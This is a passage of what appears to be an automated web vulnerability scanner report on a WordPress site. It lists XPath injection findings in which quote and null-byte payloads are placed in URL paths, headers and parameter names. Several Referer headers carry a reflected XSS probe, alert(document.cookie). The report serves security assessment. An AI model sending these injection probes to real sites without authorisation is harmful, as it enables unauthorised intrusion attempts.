Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:14:53 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:14:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.11. http://www.installsoftware.com/wp-admin/css/login.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/login.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css/login.css' HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:15:36 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:15:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.12. http://www.installsoftware.com/wp-admin/css/login.css [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/login.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css/login.css HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:14:01 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 20:14:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.13. http://www.installsoftware.com/wp-admin/css/login.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/login.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css/login.css?1%00'=1 HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; wordpress_test_cookie=WP+Cookie+check; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863;

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:13:51 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:13:51 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.14. http://www.installsoftware.com/wp-admin/css/login.css [ver parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/login.css

Issue detail

The ver parameter appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the ver parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-admin/css/login.css?ver=20100601%00' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/wp-login.php
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:17:58 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:17:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.15. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content'/themes/rt_mynxx_wp/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:11 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:12 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.16. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes'/rt_mynxx_wp/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.17. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp'/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:25 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.18. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css'/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:38 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.19. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/light.css' HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:51 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:52 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.20. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload %00' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/light.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10%00'
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:47 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44296

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.21. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/light.css [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/light.css

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp/css/light.css?1'=1 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:12:43 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:12:43 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44341

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.22. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content'/themes/rt_mynxx_wp/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:02 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:03 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.23. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes'/rt_mynxx_wp/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 21:13:14 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 21:13:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...

1.24. http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.installsoftware.com
Path:   /wp-content/themes/rt_mynxx_wp/css/rokmoomenu.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /wp-content/themes/rt_mynxx_wp'/css/rokmoomenu.css HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Referer: http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effe87d33d24/security_software
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
